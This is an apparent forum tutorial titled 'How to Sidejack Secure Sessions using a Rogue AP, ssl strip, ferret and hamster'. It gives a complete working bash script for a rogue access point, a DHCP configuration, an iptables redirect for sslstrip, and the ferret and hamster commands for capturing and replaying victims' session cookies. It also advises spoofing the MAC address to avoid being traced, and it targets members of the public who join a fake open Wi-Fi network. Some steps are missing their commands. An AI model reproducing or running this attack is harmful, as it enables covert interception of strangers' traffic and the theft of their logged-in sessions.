First off, this is a tutorial based on fifo_thekid's information. So hats off to your, sir. 
OK. What were going to be doing is setting up a rogue access point and side-jacking session cookies using ferret and hamster. Here's what you will need:
Roguev3.sh
ettercap
dhcp3-server (with custom dhcpd.conf file)
ferret
hamster
2 Network Interfaces (1 wired + 1 Wireless or 2 Wireless. One of the wireless interfaces needs to be capable of monitoring.)
All of these are built in to BT4PF, with the exception of Roguev3.sh and (obviously) the custom dhcp conf file and network interfaces. Go to your /pentest/wireless directory and create a new file called Roguev3.sh and fill it in as follows:
Code:
#!/bin/bash
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
echo -n "Enter your wireless interface MAC(XX:XX:XX:XX:XX:XX) [Optional,]: "
read -e MAC
echo -n "Enter the channel you would like your rogue AP to be called [Optional]: "
read -e CHAN
killall -9 dhcpcd dhcpd3 airbase-ng ettercap
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
modprobe tun &
cmd="konsole -e airbase-ng -e ""$ESSID"" -P -C 30 -v "
if [ -n "$CHAN" ]; then
cmd=$cmd"-c "$CHAN" "
fi
if [ -n "$MAC" ]; then
cmd=$cmd"-a "$MAC" "
fi
cmd=$cmd"$WIFACE"
$cmd &
echo "Witing 10 seconds for the SoftAP to be established"
sleep 10
echo "SoftAP should be working now"
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
rm /var/run/dhcpd.pid
touch /var/run/dhcpd.pid
chgrp dhcpd /var/run/dhcpd.pid
chown dhcpd /var/run/dhcpd.pid
konsole -e dhcpd3 -d -f -cf /etc/dhcpd.conf at0 &
konsole -e ettercap -T -p -q -i at0 // // &
echo "Witing 8 seconds for portforwarding and DHCP server"
sleep 8
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "Portforwarding and DHCP should be working now"
NOTE THAT THIS IS NOT MY CODE, BUT I COULD NOT LINK TO A URL.
Credit for this goes to fifo_thekid, because its his script!
Once you have done that, open a Konsole and type:
Code:
chmod +x /pentest/wireless/Roguev3.sh
so we can use it accordingly.
Lets get started.
First off, we need to make some changes to the DHCP files. I'll be showing my examples with vim. If you want to use a different editor, more power to you. So the first thing:
vim /etc/default/dhcp3-server
Down at the very bottom, you will see something that says:
Even if there is something filled in between the quotes, that's ok, because we're going to be changing it anyway. change it to:
This will come into play later.
Now, we need to change our dhcp.conf file to hand out IPs the way we want it to. So open a console and go to /etc/dhcp3. We Of course want to back up our current dhcpd.conf file to something like dhcpd.conf.old or something like that. Now create a dhcpd.conf file that looks like this:
Code:
#DHCPD CONF FILE
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 208.67.222.222 208.67.220.220
}
This will allow our Rogue AP to hand out IPs using 10.0.0.100-10.0.0.254
Now open a Konsole and type:
Code:
/pentest/wireless/Roguev3.sh
You will be prompted for some information:
1. Internet interface. Whatever interface connects to the internet, input that.
2. Wireless interface. Whichever wireless interface is capable of monitoring, input that.
3. ESSID. Input the name of the Rogue ESSID you want the fake AP to put out.
4. Wireless Interface MAC (butt covering). Input a fake mac here if desired. If you dont, it will use the mac of the wireless adapter, which would make it very easy to trace back to you. This is optional.
5. Channel Output. Whatever channel you want the fake AP to put out. Also optional.
Some other windows will pop up after a number of seconds. LEAVE THEM ALL RUNNING! these are starting the rogue AP info.
Once they finish, open a new shell and type:
This is going to start ssl strip so that we can view secure sessions as necessary.
Open another shell and type:
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
This is going to route all http web traffic through port 10000. Because were using sslstrip, ALL traffic, even https, will go through this port.
In the same shell, type:
Code:
service dhcp3-server start
Although the Roguev3.sh script tries to start DHCP, it doesn't work because it has to create the interface first, so we have to start it manually.
Still in the same shell, type:
Code:
/pentest/exploits/ferret/bin/ferret -i at0
this starts monitoring on the Rogue DHCP service. Leave this running.
In a new shell, type:
Code:
/pentest/exploits/hamster/bin/hamster
This is going to start the hamster sidejacking tool to keep an eye on session cookies.
Now, open up Konqueror. We need to route it through our local hamster proxy to view traffic, so go to Settings > Configure Konqueror and choose Proxy on the left. Pick Manually Specify and route it through 127.0.0.1 on port 1234.
What you have accomplished now is creating a Rogue AP that people will see when they scan for wireless networks. It shows up as an open network. Once they connect to said network, you capture all traffic using your BackTrack machine before traffic reaches your internet connection. In other words, this is a very sneaky man-in-the-middle attack.
Now, go to http-colon-slash-slash-hamster in Konqueror and watch for traffic and available sessions. When cookies are captured, the host will show up on the right. Click on the host link to view sessions.
Happy Sidejacking!
How to Sidejack Secure Sessions using a Rogue AP, ssl strip, ferret and hamster
